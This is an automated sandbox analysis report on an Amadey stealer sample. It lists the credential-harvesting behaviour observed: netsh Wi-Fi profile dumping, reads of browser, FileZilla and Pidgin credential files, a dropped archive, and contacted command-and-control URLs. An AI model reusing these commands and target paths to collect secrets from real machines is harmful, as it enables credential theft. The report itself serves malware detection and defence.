    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Uses netsh to modify the Windows network and firewall settings
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    barindex
    Yara detected Amadeys stealer DLL
    Source: Yara matchFile source: mU3Ob2XcCt.dll, type: SAMPLE
    Tries to harvest and steal WLAN passwords
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.jsonJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.jsonJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
    Tries to steal Instant Messenger accounts or passwords
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\QmJcHrIEjiRPwWgkcvDZmfiseXJDfKIUoQbJGRFqPokDMPgmdfjOspjdqaNuAqrKMAgsr\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\QmJcHrIEjiRPwWgkcvDZmfiseXJDfKIUoQbJGRFqPokDMPgmdfjOspjdqaNuAqrKMAgsr\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\QmJcHrIEjiRPwWgkcvDZmfiseXJDfKIUoQbJGRFqPokDMPgmdfjOspjdqaNuAqrKMAgsr\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading    		111
    Process Injection    		1
    Disable or Modify Tools    		2
    OS Credential Dumping    		1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		1
    Credentials in Registry    		1
    Process Discovery    		Remote Desktop Protocol2
    Data from Local System    		1
    Non-Application Layer Protocol    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
    Process Injection    		1
    Credentials In Files    		21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive11
    Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Rundll32    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials13
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542875 Sample: mU3Ob2XcCt.exe Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Sigma detected: Capture Wi-Fi password 2->58 60 5 other signatures 2->60 9 loaddll64.exe 1 2->9         started        process3 process4 11 rundll32.exe 25 9->11         started        14 rundll32.exe 23 9->14         started        17 cmd.exe 1 9->17         started        19 3 other processes 9->19 dnsIp5 70 System process connects to network (likely due to code injection or exploit) 11->70 72 Tries to steal Instant Messenger accounts or passwords 11->72 74 Tries to harvest and steal ftp login credentials 11->74 76 Tries to harvest and steal browser information (history, passwords, etc) 11->76 21 powershell.exe 11->21         started        24 netsh.exe 2 11->24         started        52 185.215.113.217, 49730, 49731, 49732 WHOLESALECONNECTIONSNL Portugal 14->52 78 Uses netsh to modify the Windows network and firewall settings 14->78 80 Tries to harvest and steal WLAN passwords 14->80 26 powershell.exe 14->26         started        29 netsh.exe 2 14->29         started        31 rundll32.exe 25 17->31         started        signatures6 process7 file8 33 conhost.exe 21->33         started        35 conhost.exe 24->35         started        50 C:\Users\user\...\246122658369_Desktop.zip, Zip 26->50 dropped 62 Loading BitLocker PowerShell Module 26->62 37 conhost.exe 26->37         started        39 conhost.exe 29->39         started        64 Tries to steal Instant Messenger accounts or passwords 31->64 66 Tries to harvest and steal WLAN passwords 31->66 41 powershell.exe 25 31->41         started        44 netsh.exe 2 31->44         started        signatures9 process10 signatures11 68 Loading BitLocker PowerShell Module 41->68 46 conhost.exe 41->46         started        48 conhost.exe 44->48         started        process12

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    mU3Ob2XcCt.dll32%ReversingLabsWin64.Infostealer.Tinba

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://aka.ms/pscore680%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://185.215.113.217/CoreOPT/index.phptrue
      		unknown
      http://185.215.113.217/CoreOPT/index.php?wal=1true
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1795696530.00000207463D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872628255.000002CA90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA818D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2001321046.00000275E99F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2017039352.00000275F1CB2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2017492572.00000275F1CC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275DAE93000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://go.microsoft.copowershell.exe, 0000000A.00000002.1907194891.000002CAEA097000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.1795696530.0000020744D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpfalse
            		unknown
            http://185.215.113.217/OQarundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://185.215.113.217/CoreOPT/index.php?wal=1errundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000009.00000002.1795696530.0000020746075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA81541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275DAFAE000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  http://185.215.113.217/CoreOPT/index.php?wal=1/Qrundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.217/CoreOPT/index.php$Lrundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.217/CoreOPT/index.php?wal=1trundll32.exe, 00000004.00000002.1957498122.0000019A2CFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.217/CoreOPT/index.php?wal=1ocalrundll32.exe, 00000003.00000002.1957547430.000001EB5A82C000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.217/CoreOPT/index.php7rundll32.exe, 0000000E.00000002.2036889929.000001C6671CA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.217/CoreOPT/index.php?wal=1Erundll32.exe, 00000004.00000002.1957498122.0000019A2CFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.1795696530.0000020744D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275D9BA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/powershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1795696530.00000207463D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872628255.000002CA90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA818D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2001321046.00000275E99F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275DB256000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://185.215.113.217/$rundll32.exe, 00000004.00000002.1957498122.0000019A2CFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://aka.ms/pscore68powershell.exe, 00000009.00000002.1795696530.0000020744B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275D9981000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://185.215.113.217/CoreOPT/index.phpXLWrundll32.exe, 00000003.00000002.1957547430.000001EB5A806000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1795696530.0000020744B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1795147830.000002CA80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1848317512.00000275D9981000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://185.215.113.217/CoreOPT/index.php?wal=1?~rundll32.exe, 00000003.00000002.1957547430.000001EB5A82C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.217
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1542875
                                      Start date and time:2024-10-26 19:12:47 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 37s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:23
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:mU3Ob2XcCt.dll
                                      (renamed file extension from exe to dll, renamed because original name is a hash value)
                                      Original Sample Name:af03a0d9fbfcafefa431092f93d37f01.exe
                                      Detection:MAL
                                      Classification:mal100.phis.troj.spyw.evad.winDLL@32/20@0/1
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 4
                                      • Number of non-executed functions: 1
                                      Cookbook Comments:
                                      • Stop behavior analysis, all processes terminated

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 6816 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: mU3Ob2XcCt.dll

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      13:13:45API Interceptor76x Sleep call for process: powershell.exe modified
                                      13:13:48API Interceptor1x Sleep call for process: loaddll64.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.217ZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
